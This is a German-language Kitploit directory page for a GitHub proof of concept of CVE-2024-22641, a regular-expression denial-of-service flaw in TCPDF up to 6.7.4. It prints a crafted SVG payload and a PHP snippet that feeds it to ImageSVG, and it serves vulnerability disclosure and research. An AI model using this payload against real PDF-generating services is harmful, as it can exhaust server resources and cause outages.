Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-22641 — Proof-of-concept für CVE-2024-22641: ReDoS-Schwachstelle in TCPDF <=6.7.4, ausgelöst durch manipulierte SVG-Dateien, die Erschöpfung des Regex-Rückverfolgungslimits demonstriert. | Kitploit
Tools/GitHubGitHub/zunak/cve-2024-22641
SchwachstellenanalyseExploitationWebsicherheitFuzzingPapers & ForschungLernen & Bildung
GitHubzunak/cve-2024-22641

CVE-2024-22641

Proof-of-concept für CVE-2024-22641: ReDoS-Schwachstelle in TCPDF <=6.7.4, ausgelöst durch manipulierte SVG-Dateien, die Erschöpfung des Regex-Rückverfolgungslimits demonstriert.

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-22641

Schwachstellentyp

Regulärer Ausdruck Denial of Service (ReDoS)

Betroffenes Produkt und Version

TCPDF <= 6.7.4

Angriffsvektor

TCPDF analysiert SVG-Dateien, die manipulierte Nutzlasten enthalten.

Beschreibung

TCPDF Version <= 6.7.4 ist anfällig für ReDoS (Regular Expression Denial of Service), wenn eine nicht vertrauenswürdige SVG-Datei analysiert wird.

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

Hinweis: Eine Überprüfung mit preg_last_error() nach der anfälligen Codezeile zeigt, dass der reguläre Ausdruck mit PREG_BACKTRACK_LIMIT_ERROR beendet wird.

Tool herunterladen